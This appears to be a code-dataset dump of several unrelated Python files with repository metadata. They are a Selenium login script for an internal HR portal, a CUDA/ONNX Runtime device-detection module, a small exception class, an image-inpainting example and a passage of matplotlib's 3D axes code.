self.userid_field = self.browser.find_element_by_id("txtID")
self.pass_field = self.browser.find_element_by_id("txtPwd")
def login(self, userid, password):
self.userid_field.send_keys(userid)
self.pass_field.send_keys(password)
self.pass_field.send_keys(Keys.ENTER)
delay = 3 #seconds
try:
WebDriverWait(self.browser, delay).until(EC.presence_of_element_located((By.ID, "btnOK")))
logging.info("'OK button' located and clicked.")
print("Page is ready!")
except TimeoutException:
logging.info("Timeout while locating 'OK button'.")
except NoSuchElementException:
logging.info("Not able to locate 'OK button'.")
try:
WebDriverWait(self.browser, delay).until(EC.presence_of_element_located((By.ID, "lblExit"))).click()
logging.info("'Exit button' located and clicked.")
except TimeoutException:
logging.info("Timeout while locating 'Exit button'.")
except NoSuchElementException:
logging.info("Not able to locate 'Exit button'.")
def get_password(secret_key):
cipher_suite = Fernet(secret_key.encode(encoding="UTF-8"))
return (cipher_suite.decrypt(HASH.encode(encoding="UTF-8"))).decode(encoding="UTF-8")
if __name__ == "__main__":
main()
try:
HASH = os.environ['AD_PASS_HASH']
SECRET = os.environ['AD_SEC_KEY']
EMP_ID = os.environ['AD_EMP_ID']
AD_URL = os.environ['AD_URL']
except KeyError as key:
logging.info('%s key is not found environment variable.', key)
logging.info('################# Finished On %s #################', datetime.datetime.now())
adrenalin_url = "http://10.1.1.209/adrenalin/"
obj = AdrenalinLogin(AD_URL)
logging.info('================================================================================')
obj.login(EMP_ID, get_password(SECRET))
logging.info('################# Finished On %s #################', datetime.datetime.now())
logging.info('================================================================================')
| 43.144737
| 112
| 0.603843
|
ea9d0cb4beaaae55690314ef5399939546097328
| 7,986
|
py
|
Python
|
xlib/onnxruntime/device.py
|
kitiv/DeepFaceLive
|
ca3a005917ae067576b795d8b9fef5a8b3483010
|
[
"MIT"
] | 4
|
2021-07-23T16:34:24.000Z
|
2022-03-01T18:31:59.000Z
|
xlib/onnxruntime/device.py
|
kitiv/DeepFaceLive
|
ca3a005917ae067576b795d8b9fef5a8b3483010
|
[
"MIT"
] | null | null | null |
xlib/onnxruntime/device.py
|
kitiv/DeepFaceLive
|
ca3a005917ae067576b795d8b9fef5a8b3483010
|
[
"MIT"
] | 1
|
2021-09-06T15:05:28.000Z
|
2021-09-06T15:05:28.000Z
|
import ctypes
import os
from typing import List
class ORTDeviceInfo:
"""
Represents picklable ONNXRuntime device info
"""
def __init__(self, index=None, name=None, total_memory=None, free_memory=None, compute_capability=None):
self._index : int = index
self._name : str = name
self._total_memory : int = total_memory
self._free_memory : int = free_memory
self._compute_capability : int = compute_capability
def __getstate__(self):
return self.__dict__.copy()
def __setstate__(self, d):
self.__init__()
self.__dict__.update(d)
def is_cpu(self) -> bool: return self._index == -1
def get_index(self) -> int:
return self._index
def get_compute_capability(self) -> int:
return self._compute_capability
def get_name(self) -> str:
return self._name
def get_total_memory(self) -> int:
return self._total_memory
def get_free_memory(self) -> int:
return self._free_memory
def __eq__(self, other):
if self is not None and other is not None and isinstance(self, ORTDeviceInfo) and isinstance(other, ORTDeviceInfo):
return self._index == other._index
return False
def __hash__(self):
return self._index
def __str__(self):
if self.is_cpu():
return f"CPU"
else:
return f"[{self._index}] {self._name} [{(self._total_memory / 1024**3) :.3}Gb]"
def __repr__(self):
return f'{self.__class__.__name__} object: ' + self.__str__()
# class ORTDevicesInfo:
# """
# a list of ORTDeviceInfo
# """
# def __init__(self, devices : List[ORTDeviceInfo] = None):
# if devices is None:
# devices = []
# self._devices = devices
# def __getstate__(self):
# return self.__dict__.copy()
# def __setstate__(self, d):
# self.__init__()
# self.__dict__.update(d)
# def add(self, device_or_devices : ORTDeviceInfo):
# if isinstance(device_or_devices, ORTDeviceInfo):
# if device_or_devices not in self._devices:
# self._devices.append(device_or_devices)
# elif isinstance(device_or_devices, ORTDevicesInfo):
# for device in device_or_devices:
# self.add(device)
# def copy(self):
# return copy.deepcopy(self)
# def get_count(self): return len(self._devices)
# def get_highest_total_memory_device(self) -> ORTDeviceInfo:
# """
# returns ORTDeviceInfo with highest available memory, if devices support total_memory parameter
# """
# result = None
# idx_mem = 0
# for device in self._devices:
# mem = device.get_total_memory()
# if result is None or (mem is not None and mem > idx_mem):
# result = device
# idx_mem = mem
# return result
# def get_lowest_total_memory_device(self) -> ORTDeviceInfo:
# """
# returns ORTDeviceInfo with lowest available memory, if devices support total_memory parameter
# """
# result = None
# idx_mem = sys.maxsize
# for device in self._devices:
# mem = device.get_total_memory()
# if result is None or (mem is not None and mem < idx_mem):
# result = device
# idx_mem = mem
# return result
# def __len__(self):
# return len(self._devices)
# def __getitem__(self, key):
# result = self._devices[key]
# if isinstance(key, slice):
# return self.__class__(result)
# return result
# def __iter__(self):
# for device in self._devices:
# yield device
# def __str__(self): return f'{self.__class__.__name__}:[' + ', '.join([ device.__str__() for device in self._devices ]) + ']'
# def __repr__(self): return f'{self.__class__.__name__}:[' + ', '.join([ device.__repr__() for device in self._devices ]) + ']'
_ort_devices_info = None
def get_cpu_device() -> ORTDeviceInfo:
return ORTDeviceInfo(index=-1, name='CPU', total_memory=0, free_memory=0, compute_capability=0)
def get_available_devices_info(include_cpu=True, cpu_only=False) -> List[ORTDeviceInfo]:
"""
returns a list of available ORTDeviceInfo
"""
global _ort_devices_info
if _ort_devices_info is None:
_initialize_ort_devices()
devices = []
if not cpu_only:
for i in range ( int(os.environ['ORT_DEVICES_COUNT']) ):
devices.append ( ORTDeviceInfo(index=i,
name=os.environ[f'ORT_DEVICE_{i}_NAME'],
total_memory=int(os.environ[f'ORT_DEVICE_{i}_TOTAL_MEM']),
free_memory=int(os.environ[f'ORT_DEVICE_{i}_FREE_MEM']),
compute_capability=int(os.environ[f'ORT_DEVICE_{i}_CC']) ))
if include_cpu or cpu_only:
devices.append(get_cpu_device())
_ort_devices_info = devices
return _ort_devices_info
def _initialize_ort_devices():
"""
Determine available ORT devices, and place info about them to os.environ,
they will be available in spawned subprocesses.
Using only python ctypes and default lib provided with NVIDIA drivers.
"""
if int(os.environ.get('ORT_DEVICES_INITIALIZED', 0)) == 0:
os.environ['ORT_DEVICES_INITIALIZED'] = '1'
os.environ['ORT_DEVICES_COUNT'] = '0'
os.environ['CUDA_CACHE_MAXSIZE'] = '2147483647'
try:
libnames = ('libcuda.so', 'libcuda.dylib', 'nvcuda.dll')
for libname in libnames:
try:
cuda = ctypes.CDLL(libname)
except:
continue
else:
break
else:
return
nGpus = ctypes.c_int()
name = b' ' * 200
cc_major = ctypes.c_int()
cc_minor = ctypes.c_int()
freeMem = ctypes.c_size_t()
totalMem = ctypes.c_size_t()
device = ctypes.c_int()
context = ctypes.c_void_p()
devices = []
if cuda.cuInit(0) == 0 and \
cuda.cuDeviceGetCount(ctypes.byref(nGpus)) == 0:
for i in range(nGpus.value):
if cuda.cuDeviceGet(ctypes.byref(device), i) != 0 or \
cuda.cuDeviceGetName(ctypes.c_char_p(name), len(name), device) != 0 or \
cuda.cuDeviceComputeCapability(ctypes.byref(cc_major), ctypes.byref(cc_minor), device) != 0:
continue
if cuda.cuCtxCreate_v2(ctypes.byref(context), 0, device) == 0:
if cuda.cuMemGetInfo_v2(ctypes.byref(freeMem), ctypes.byref(totalMem)) == 0:
cc = cc_major.value * 10 + cc_minor.value
devices.append ({'name' : name.split(b'\0', 1)[0].decode(),
'total_mem' : totalMem.value,
'free_mem' : freeMem.value,
'cc' : cc
})
cuda.cuCtxDetach(context)
except Exception as e:
print(f'CUDA devices initialization error: {e}')
devices = []
os.environ['ORT_DEVICES_COUNT'] = str(len(devices))
for i, device in enumerate(devices):
os.environ[f'ORT_DEVICE_{i}_NAME'] = device['name']
os.environ[f'ORT_DEVICE_{i}_TOTAL_MEM'] = str(device['total_mem'])
os.environ[f'ORT_DEVICE_{i}_FREE_MEM'] = str(device['free_mem'])
os.environ[f'ORT_DEVICE_{i}_CC'] = str(device['cc'])
_initialize_ort_devices()
| 35.811659
| 132
| 0.563862
|
d06d1563b3de44fa9a1f3e3d7a5df14f7109a9d4
| 387
|
py
|
Python
|
csp/contradiction_exception.py
|
abeccaro/csp-solver
|
a761dee02a4dd12162eb55ef34cc0989c79567cc
|
[
"MIT"
] | null | null | null |
csp/contradiction_exception.py
|
abeccaro/csp-solver
|
a761dee02a4dd12162eb55ef34cc0989c79567cc
|
[
"MIT"
] | null | null | null |
csp/contradiction_exception.py
|
abeccaro/csp-solver
|
a761dee02a4dd12162eb55ef34cc0989c79567cc
|
[
"MIT"
] | null | null | null |
class ContradictionException(Exception):
"""Exception raised for any Contradiction (unfeasability) happening during propagation or assignments.
:param message: The message to print
:type message: str
"""
def __init__(self, message):
self.message = message
def __str(self):
return 'ContradictionException: ' + self.message
| 27.642857
| 107
| 0.661499
|
9f549d9c9efa1b21d0b72dd3fb30f00e5f5bbc41
| 1,219
|
py
|
Python
|
examples/example_inpainting.py
|
mmunar97/inPYinting
|
226e7840c0acf0b0fe3cf6db25a1411df6595a02
|
[
"MIT"
] | 1
|
2020-06-02T14:01:40.000Z
|
2020-06-02T14:01:40.000Z
|
examples/example_inpainting.py
|
mmunar97/inPYinting
|
226e7840c0acf0b0fe3cf6db25a1411df6595a02
|
[
"MIT"
] | null | null | null |
examples/example_inpainting.py
|
mmunar97/inPYinting
|
226e7840c0acf0b0fe3cf6db25a1411df6595a02
|
[
"MIT"
] | null | null | null |
import cv2
from inPYinting.base.inpainting_algorithms import InpaintingAlgorithm
from inPYinting.inpainter import Inpainter
if __name__ == "__main__":
image_path = r"C:\Users\Usuario\Desktop\Inpainting Demo\mumford_shah_clean.png"
mask_path = r"C:\Users\Usuario\Desktop\Inpainting Demo\mumford_shah_mask.png"
image = cv2.imread(image_path)
mask = 255-cv2.imread(mask_path, cv2.IMREAD_GRAYSCALE)
inpainter = Inpainter(image=image, mask=mask)
#result_fm = inpainter.inpaint(InpaintingAlgorithm.FAST_MARCHING)
result_ns = inpainter.inpaint(InpaintingAlgorithm.NAVIER_STOKES)
#result_sc = inpainter.inpaint(InpaintingAlgorithm.SOFTCOLOR_FUZZY_MORPHOLOGY)
#result_eb = inpainter.inpaint(InpaintingAlgorithm.EXEMPLAR_BASED)
#result_pde_amle = inpainter.inpaint(InpaintingAlgorithm.PDE_AMLE)
#result_pde_har = inpainter.inpaint(InpaintingAlgorithm.PDE_HARMONIC)
#result_pde_ms = inpainter.inpaint(InpaintingAlgorithm.PDE_MUMFORD_SHAH)
#result_pde_ch = inpainter.inpaint(InpaintingAlgorithm.PDE_CAHN_HILLIARD)
#result_pde_tr = inpainter.inpaint(InpaintingAlgorithm.PDE_TRANSPORT)
cv2.imwrite(r"C:\Users\Usuario\Desktop\inpaint.png", result_ns.inpainted_image)
| 45.148148
| 83
| 0.803117
|
4392bb0b1571c7fae21d8c6e03c05aeb90519b50
| 103,120
|
py
|
Python
|
venv/Lib/site-packages/mpl_toolkits/mplot3d/axes3d.py
|
adityasagam/azurePy
|
bf6c61c1d6f52521602bae2ab3f06ffba4e30444
|
[
"MIT"
] | 130
|
2018-02-03T10:25:54.000Z
|
2022-03-25T22:27:22.000Z
|
venv/Lib/site-packages/mpl_toolkits/mplot3d/axes3d.py
|
uncledragon/CalibrationLibrary
|
952abcf471b819b6b6dfa23b6d5dd248155f9dbf
|
[
"MIT"
] | 12
|
2021-03-09T03:01:16.000Z
|
2022-03-11T23:59:36.000Z
|
venv/Lib/site-packages/mpl_toolkits/mplot3d/axes3d.py
|
uncledragon/CalibrationLibrary
|
952abcf471b819b6b6dfa23b6d5dd248155f9dbf
|
[
"MIT"
] | 64
|
2018-04-25T08:51:57.000Z
|
2022-01-29T14:13:57.000Z
|
"""
axes3d.py, original mplot3d version by John Porter
Created: 23 Sep 2005
Parts fixed by Reinier Heeres <reinier@heeres.eu>
Minor additions by Ben Axelrod <baxelrod@coroware.com>
Significant updates and revisions by Ben Root <ben.v.root@gmail.com>
Module containing Axes3D, an object which can plot 3D objects on a
2D matplotlib figure.
"""
from functools import reduce
from collections import defaultdict
import math
import warnings
import numpy as np
from matplotlib import artist
import matplotlib.axes as maxes
import matplotlib.cbook as cbook
import matplotlib.collections as mcoll
import matplotlib.colors as mcolors
import matplotlib.docstring as docstring
import matplotlib.scale as mscale
import matplotlib.transforms as mtransforms
from matplotlib.axes import Axes, rcParams
from matplotlib.colors import Normalize, LightSource
from matplotlib.transforms import Bbox
from matplotlib.tri.triangulation import Triangulation
from . import art3d
from . import proj3d
from . import axis3d
def unit_bbox():
box = Bbox(np.array([[0, 0], [1, 1]]))
return box
class Axes3D(Axes):
"""
3D axes object.
"""
name = '3d'
_shared_z_axes = cbook.Grouper()
def __init__(
self, fig, rect=None, *args,
azim=-60, elev=30, zscale=None, sharez=None, proj_type='persp',
**kwargs):
'''
Build an :class:`Axes3D` instance in
:class:`~matplotlib.figure.Figure` *fig* with
*rect=[left, bottom, width, height]* in
:class:`~matplotlib.figure.Figure` coordinates
Optional keyword arguments:
================ =========================================
Keyword Description
================ =========================================
*azim* Azimuthal viewing angle (default -60)
*elev* Elevation viewing angle (default 30)
*zscale* [%(scale)s]
*sharez* Other axes to share z-limits with
*proj_type* 'persp' or 'ortho' (default 'persp')
================ =========================================
.. versionadded :: 1.2.1
*sharez*
''' % {'scale': ' | '.join([repr(x) for x in mscale.get_scale_names()])}
if rect is None:
rect = [0.0, 0.0, 1.0, 1.0]
self._cids = []
self.initial_azim = azim
self.initial_elev = elev
self.set_proj_type(proj_type)
self.xy_viewLim = unit_bbox()
self.zz_viewLim = unit_bbox()
self.xy_dataLim = unit_bbox()
self.zz_dataLim = unit_bbox()
# inihibit autoscale_view until the axes are defined
# they can't be defined until Axes.__init__ has been called
self.view_init(self.initial_elev, self.initial_azim)
self._ready = 0
self._sharez = sharez
if sharez is not None:
self._shared_z_axes.join(self, sharez)
self._adjustable = 'datalim'
super().__init__(fig, rect, frameon=True, *args, **kwargs)
# Disable drawing of axes by base class
super().set_axis_off()
# Enable drawing of axes by Axes3D class
self.set_axis_on()
self.M = None
# func used to format z -- fall back on major formatters
self.fmt_zdata = None
if zscale is not None:
self.set_zscale(zscale)
if self.zaxis is not None:
self._zcid = self.zaxis.callbacks.connect(
'units finalize', lambda: self._on_units_changed(scalez=True))
else:
self._zcid = None
self._ready = 1
self.mouse_init()
self.set_top_view()
self.patch.set_linewidth(0)
# Calculate the pseudo-data width and height
pseudo_bbox = self.transLimits.inverted().transform([(0, 0), (1, 1)])
self._pseudo_w, self._pseudo_h = pseudo_bbox[1] - pseudo_bbox[0]
self.figure.add_axes(self)
# mplot3d currently manages its own spines and needs these turned off
# for bounding box calculations
for k in self.spines.keys():
self.spines[k].set_visible(False)
def set_axis_off(self):
self._axis3don = False
self.stale = True
def set_axis_on(self):
self._axis3don = True
self.stale = True
def have_units(self):
"""
Return *True* if units are set on the *x*, *y*, or *z* axes
"""
return (self.xaxis.have_units() or self.yaxis.have_units() or
self.zaxis.have_units())
def convert_zunits(self, z):
"""
For artists in an axes, if the zaxis has units support,
convert *z* using zaxis unit type
.. versionadded :: 1.2.1
"""
return self.zaxis.convert_units(z)
def _process_unit_info(self, xdata=None, ydata=None, zdata=None,
kwargs=None):
"""
Look for unit *kwargs* and update the axis instances as necessary
"""
super()._process_unit_info(xdata=xdata, ydata=ydata, kwargs=kwargs)
if self.xaxis is None or self.yaxis is None or self.zaxis is None:
return
if zdata is not None:
# we only need to update if there is nothing set yet.
if not self.zaxis.have_units():
self.zaxis.update_units(xdata)
# process kwargs 2nd since these will override default units
if kwargs is not None:
zunits = kwargs.pop('zunits', self.zaxis.units)
if zunits != self.zaxis.units:
self.zaxis.set_units(zunits)
# If the units being set imply a different converter,
# we need to update.
if zdata is not None:
self.zaxis.update_units(zdata)
def set_top_view(self):
# this happens to be the right view for the viewing coordinates
# moved up and to the left slightly to fit labels and axes
xdwl = (0.95/self.dist)
xdw = (0.9/self.dist)
ydwl = (0.95/self.dist)
ydw = (0.9/self.dist)
# This is purposely using the 2D Axes's set_xlim and set_ylim,
# because we are trying to place our viewing pane.
super().set_xlim(-xdwl, xdw, auto=None)
super().set_ylim(-ydwl, ydw, auto=None)
def _init_axis(self):
'''Init 3D axes; overrides creation of regular X/Y axes'''
self.w_xaxis = axis3d.XAxis('x', self.xy_viewLim.intervalx,
self.xy_dataLim.intervalx, self)
self.xaxis = self.w_xaxis
self.w_yaxis = axis3d.YAxis('y', self.xy_viewLim.intervaly,
self.xy_dataLim.intervaly, self)
self.yaxis = self.w_yaxis
self.w_zaxis = axis3d.ZAxis('z', self.zz_viewLim.intervalx,
self.zz_dataLim.intervalx, self)
self.zaxis = self.w_zaxis
for ax in self.xaxis, self.yaxis, self.zaxis:
ax.init3d()
def get_children(self):
return [self.zaxis] + super().get_children()
def _get_axis_list(self):
return super()._get_axis_list() + (self.zaxis, )
def unit_cube(self, vals=None):
minx, maxx, miny, maxy, minz, maxz = vals or self.get_w_lims()
return [(minx, miny, minz),
(maxx, miny, minz),
(maxx, maxy, minz),
(minx, maxy, minz),
(minx, miny, maxz),
(maxx, miny, maxz),
(maxx, maxy, maxz),
(minx, maxy, maxz)]
def tunit_cube(self, vals=None, M=None):
if M is None:
M = self.M
xyzs = self.unit_cube(vals)
tcube = proj3d.proj_points(xyzs, M)
return tcube
def tunit_edges(self, vals=None, M=None):
tc = self.tunit_cube(vals, M)
edges = [(tc[0], tc[1]),
(tc[1], tc[2]),
(tc[2], tc[3]),
(tc[3], tc[0]),
(tc[0], tc[4]),
(tc[1], tc[5]),
(tc[2], tc[6]),
(tc[3], tc[7]),
(tc[4], tc[5]),
(tc[5], tc[6]),
(tc[6], tc[7]),
(tc[7], tc[4])]
return edges
@artist.allow_rasterization
def draw(self, renderer):
# draw the background patch
self.patch.draw(renderer)
self._frameon = False
# first, set the aspect
# this is duplicated from `axes._base._AxesBase.draw`
# but must be called before any of the artist are drawn as
# it adjusts the view limits and the size of the bounding box
# of the axes
locator = self.get_axes_locator()
if locator:
pos = locator(self, renderer)
self.apply_aspect(pos)
else:
self.apply_aspect()
# add the projection matrix to the renderer
self.M = self.get_proj()
renderer.M = self.M
renderer.vvec = self.vvec
renderer.eye = self.eye
renderer.get_axis_position = self.get_axis_position
# Calculate projection of collections and patches and zorder them.
# Make sure they are drawn above the grids.
zorder_offset = max(axis.get_zorder()
for axis in self._get_axis_list()) + 1
for i, col in enumerate(
sorted(self.collections,
key=lambda col: col.do_3d_projection(renderer),
reverse=True)):
col.zorder = zorder_offset + i
for i, patch in enumerate(
sorted(self.patches,
key=lambda patch: patch.do_3d_projection(renderer),
reverse=True)):
patch.zorder = zorder_offset + i
if self._axis3don:
# Draw panes first
for axis in self._get_axis_list():
axis.draw_pane(renderer)
# Then axes
for axis in self._get_axis_list():
axis.draw(renderer)
# Then rest
super().draw(renderer)
def get_axis_position(self):
vals = self.get_w_lims()
tc = self.tunit_cube(vals, self.M)
xhigh = tc[1][2] > tc[2][2]
yhigh = tc[3][2] > tc[2][2]
zhigh = tc[0][2] > tc[2][2]
return xhigh, yhigh, zhigh
def _on_units_changed(self, scalex=False, scaley=False, scalez=False):
"""
Callback for processing changes to axis units.
Currently forces updates of data limits and view limits.
"""
self.relim()
self.autoscale_view(scalex=scalex, scaley=scaley, scalez=scalez)
def update_datalim(self, xys, **kwargs):
pass
def get_autoscale_on(self):
"""
Get whether autoscaling is applied for all axes on plot commands
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
"""
return super().get_autoscale_on() and self.get_autoscalez_on()
def get_autoscalez_on(self):
"""
Get whether autoscaling for the z-axis is applied on plot commands
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
"""
return self._autoscaleZon
def set_autoscale_on(self, b):
"""
Set whether autoscaling is applied on plot commands
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
Parameters
----------
b : bool
"""
super().set_autoscale_on(b)
self.set_autoscalez_on(b)
def set_autoscalez_on(self, b):
"""
Set whether autoscaling for the z-axis is applied on plot commands
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
Parameters
----------
b : bool
"""
self._autoscaleZon = b
def set_zmargin(self, m):
"""
Set padding of Z data limits prior to autoscaling.
*m* times the data interval will be added to each
end of that interval before it is used in autoscaling.
accepts: float in range 0 to 1
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
"""
if m < 0 or m > 1 :
raise ValueError("margin must be in range 0 to 1")
self._zmargin = m
self.stale = True
def margins(self, *margins, x=None, y=None, z=None, tight=True):
"""
Convenience method to set or retrieve autoscaling margins.
signatures::
margins()
returns xmargin, ymargin, zmargin
::
margins(margin)
margins(xmargin, ymargin, zmargin)
margins(x=xmargin, y=ymargin, z=zmargin)
margins(..., tight=False)
All forms above set the xmargin, ymargin and zmargin
parameters. All keyword parameters are optional. A single
positional argument specifies xmargin, ymargin and zmargin.
Passing both positional and keyword arguments for xmargin,
ymargin, and/or zmargin is invalid.
The *tight* parameter
is passed to :meth:`autoscale_view`, which is executed after
a margin is changed; the default here is *True*, on the
assumption that when margins are specified, no additional
padding to match tick marks is usually desired. Setting
*tight* to *None* will preserve the previous setting.
Specifying any margin changes only the autoscaling; for example,
if *xmargin* is not None, then *xmargin* times the X data
interval will be added to each end of that interval before
it is used in autoscaling.
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
"""
if margins and x is not None and y is not None and z is not None:
raise TypeError('Cannot pass both positional and keyword '
'arguments for x, y, and/or z.')
elif len(margins) == 1:
x = y = z = margins[0]
elif len(margins) == 3:
x, y, z = margins
elif margins:
raise TypeError('Must pass a single positional argument for all '
'margins, or one for each margin (x, y, z).')
if x is None and y is None and z is None:
if tight is not True:
warnings.warn('ignoring tight=%r in get mode' % (tight,))
return self._xmargin, self._ymargin, self._zmargin
if x is not None:
self.set_xmargin(x)
if y is not None:
self.set_ymargin(y)
if z is not None:
self.set_zmargin(z)
self.autoscale_view(
tight=tight, scalex=(x is not None), scaley=(y is not None),
scalez=(z is not None)
)
def autoscale(self, enable=True, axis='both', tight=None):
"""
Convenience method for simple axis view autoscaling.
See :meth:`matplotlib.axes.Axes.autoscale` for full explanation.
Note that this function behaves the same, but for all
three axes. Therefore, 'z' can be passed for *axis*,
and 'both' applies to all three axes.
.. versionadded :: 1.1.0
This function was added, but not tested. Please report any bugs.
"""
if enable is None:
scalex = True
scaley = True
scalez = True
else:
if axis in ['x', 'both']:
self._autoscaleXon = scalex = bool(enable)
else:
scalex = False
if axis in ['y', 'both']:
self._autoscaleYon = scaley = bool(enable)
else:
scaley = False
if axis in ['z', 'both']:
self._autoscaleZon = scalez = bool(enable)
else:
scalez = False
self.autoscale_view(tight=tight, scalex=scalex, scaley=scaley,
scalez=scalez)
def auto_scale_xyz(self, X, Y, Z=None, had_data=None):
x, y, z = map(np.asarray, (X, Y, Z))
try:
x, y = x.flatten(), y.flatten()
if Z is not None:
z = z.flatten()
except AttributeError:
raise
# This updates the bounding boxes as to keep a record as
# to what the minimum sized rectangular volume holds the
# data.
self.xy_dataLim.update_from_data_xy(np.array([x, y]).T, not had_data)
if z is not None:
self.zz_dataLim.update_from_data_xy(np.array([z, z]).T, not had_data)
# Let autoscale_view figure out how to use this data.
self.autoscale_view()
def autoscale_view(self, tight=None, scalex=True, scaley=True,
scalez=True):
"""
Autoscale the view limits using the data limits.
See :meth:`matplotlib.axes.Axes.autoscale_view` for documentation.
Note that this function applies to the 3D axes, and as such
adds the *scalez* to the function arguments.
.. versionchanged :: 1.1.0
Function signature was changed to better match the 2D version.
*tight* is now explicitly a kwarg and placed first.
.. versionchanged :: 1.2.1
This is now fully functional.
"""
if not self._ready:
return
# This method looks at the rectangular volume (see above)
# of data and decides how to scale the view portal to fit it.
if tight is None:
# if image data only just use the datalim
_tight = self._tight or (
len(self.images) > 0
and len(self.lines) == len(self.patches) == 0)
else:
_tight = self._tight = bool(tight)
if scalex and self._autoscaleXon:
self._shared_x_axes.clean()
x0, x1 = self.xy_dataLim.intervalx
xlocator = self.xaxis.get_major_locator()
try:
x0, x1 = xlocator.nonsingular(x0, x1)
except AttributeError:
x0, x1 = mtransforms.nonsingular(x0, x1, increasing=False,
expander=0.05)
if self._xmargin > 0:
delta = (x1 - x0) * self._xmargin
x0 -= delta
x1 += delta
if not _tight:
x0, x1 = xlocator.view_limits(x0, x1)
self.set_xbound(x0, x1)
if scaley and self._autoscaleYon:
self._shared_y_axes.clean()
y0, y1 = self.xy_dataLim.intervaly
ylocator = self.yaxis.get_major_locator()
try:
y0, y1 = ylocator.nonsingular(y0, y1)
except AttributeError:
y0, y1 = mtransforms.nonsingular(y0, y1, increasing=False,
expander=0.05)
if self._ymargin > 0:
delta = (y1 - y0) * self._ymargin
y0 -= delta
y1 += delta
if not _tight:
y0, y1 = ylocator.view_limits(y0, y1)
self.set_ybound(y0, y1)
if scalez and self._autoscaleZon:
self._shared_z_axes.clean()
z0, z1 = self.zz_dataLim.intervalx
zlocator = self.zaxis.get_major_locator()
try:
z0, z1 = zlocator.nonsingular(z0, z1)
except AttributeError:
z0, z1 = mtransforms.nonsingular(z0, z1, increasing=False,
expander=0.05)
if self._zmargin > 0:
delta = (z1 - z0) * self._zmargin
z0 -= delta
z1 += delta
if not _tight:
z0, z1 = zlocator.view_limits(z0, z1)
self.set_zbound(z0, z1)
def get_w_lims(self):
'''Get 3D world limits.'''
minx, maxx = self.get_xlim3d()
miny, maxy = self.get_ylim3d()
minz, maxz = self.get_zlim3d()
return minx, maxx, miny, maxy, minz, maxz
def _determine_lims(self, xmin=None, xmax=None, *args, **kwargs):
if xmax is None and cbook.iterable(xmin):
xmin, xmax = xmin
if xmin == xmax:
xmin -= 0.05
xmax += 0.05
return (xmin, xmax)
def set_xlim3d(self, left=None, right=None, emit=True, auto=False,
*, xmin=None, xmax=None):
"""
Set 3D x limits.
See :meth:`matplotlib.axes.Axes.set_xlim` for full documentation.
"""
if right is None and cbook.iterable(left):
left, right = left
if xmin is not None:
cbook.warn_deprecated('3.0', name='`xmin`',
alternative='`left`', obj_type='argument')
if left is not None:
raise TypeError('Cannot pass both `xmin` and `left`')
left = xmin
if xmax is not None:
cbook.warn_deprecated('3.0', name='`xmax`',
alternative='`right`', obj_type='argument')
if right is not None:
raise TypeError('Cannot pass both `xmax` and `right`')
right = xmax
self._process_unit_info(xdata=(left, right))
left = self._validate_converted_limits(left, self.convert_xunits)
right = self._validate_converted_limits(right, self.convert_xunits)
old_left, old_right = self.get_xlim()
if left is None:
left = old_left
if right is None:
right = old_right
if left == right:
warnings.warn(('Attempting to set identical left==right results\n'
'in singular transformations; automatically expanding.\n'
'left=%s, right=%s') % (left, right))
left, right = mtransforms.nonsingular(left, right, increasing=False)
left, right = self.xaxis.limit_range_for_scale(left, right)
self.xy_viewLim.intervalx = (left, right)
if auto is not None:
self._autoscaleXon = bool(auto)
if emit:
self.callbacks.process('xlim_changed', self)
# Call all of the other x-axes that are shared with this one
for other in self._shared_x_axes.get_siblings(self):
if other is not self:
other.set_xlim(self.xy_viewLim.intervalx,
emit=False, auto=auto)
if (other.figure != self.figure and
other.figure.canvas is not None):
other.figure.canvas.draw_idle()
self.stale = True
return left, right
set_xlim = set_xlim3d
def set_ylim3d(self, bottom=None, top=None, emit=True, auto=False,
*, ymin=None, ymax=None):
"""
Set 3D y limits.
See :meth:`matplotlib.axes.Axes.set_ylim` for full documentation.
"""
if top is None and cbook.iterable(bottom):
bottom, top = bottom
if ymin is not None:
cbook.warn_deprecated('3.0', name='`ymin`',
alternative='`bottom`', obj_type='argument')
if bottom is not None:
raise TypeError('Cannot pass both `ymin` and `bottom`')
bottom = ymin
if ymax is not None:
cbook.warn_deprecated('3.0', name='`ymax`',
alternative='`top`', obj_type='argument')
if top is not None:
raise TypeError('Cannot pass both `ymax` and `top`')
top = ymax
self._process_unit_info(ydata=(bottom, top))
bottom = self._validate_converted_limits(bottom, self.convert_yunits)
top = self._validate_converted_limits(top, self.convert_yunits)
old_bottom, old_top = self.get_ylim()
if bottom is None:
bottom = old_bottom
if top is None:
top = old_top
if top == bottom:
warnings.warn(('Attempting to set identical bottom==top results\n'
'in singular transformations; automatically expanding.\n'
'bottom=%s, top=%s') % (bottom, top))
bottom, top = mtransforms.nonsingular(bottom, top, increasing=False)
bottom, top = self.yaxis.limit_range_for_scale(bottom, top)
self.xy_viewLim.intervaly = (bottom, top)
if auto is not None:
self._autoscaleYon = bool(auto)
if emit:
self.callbacks.process('ylim_changed', self)
# Call all of the other y-axes that are shared with this one
for other in self._shared_y_axes.get_siblings(self):
if other is not self:
other.set_ylim(self.xy_viewLim.intervaly,
emit=False, auto=auto)
if (other.figure != self.figure and
other.figure.canvas is not None):
other.figure.canvas.draw_idle()
self.stale = True
return bottom, top
set_ylim = set_ylim3d
def set_zlim3d(self, bottom=None, top=None, emit=True, auto=False,
*, zmin=None, zmax=None):
"""
Set 3D z limits.
See :meth:`matplotlib.axes.Axes.set_ylim` for full documentation
"""
if top is None and cbook.iterable(bottom):
bottom, top = bottom
if zmin is not None:
cbook.warn_deprecated('3.0', name='`zmin`',
alternative='`bottom`', obj_type='argument')
if bottom is not None:
raise TypeError('Cannot pass both `zmin` and `bottom`')
bottom = zmin
if zmax is not None:
cbook.warn_deprecated('3.0', name='`zmax`',
alternative='`top`', obj_type='argument')
if top is not None:
raise TypeError('Cannot pass both `zmax` and `top`')
top = zmax
self._process_unit_info(zdata=(bottom, top))
bottom = self._validate_converted_limits(bottom, self.convert_zunits)
top = self._validate_converted_limits(top, self.convert_zunits)
old_bottom, old_top = self.get_zlim()
if bottom is None:
bottom = old_bottom
if top is None:
top = old_top
if top == bottom:
warnings.warn(('Attempting to set identical bottom==top results\n'
'in singular transformations; automatically expanding.\n'
'bottom=%s, top=%s') % (bottom, top))
bottom, top = mtransforms.nonsingular(bottom, top, increasing=False)
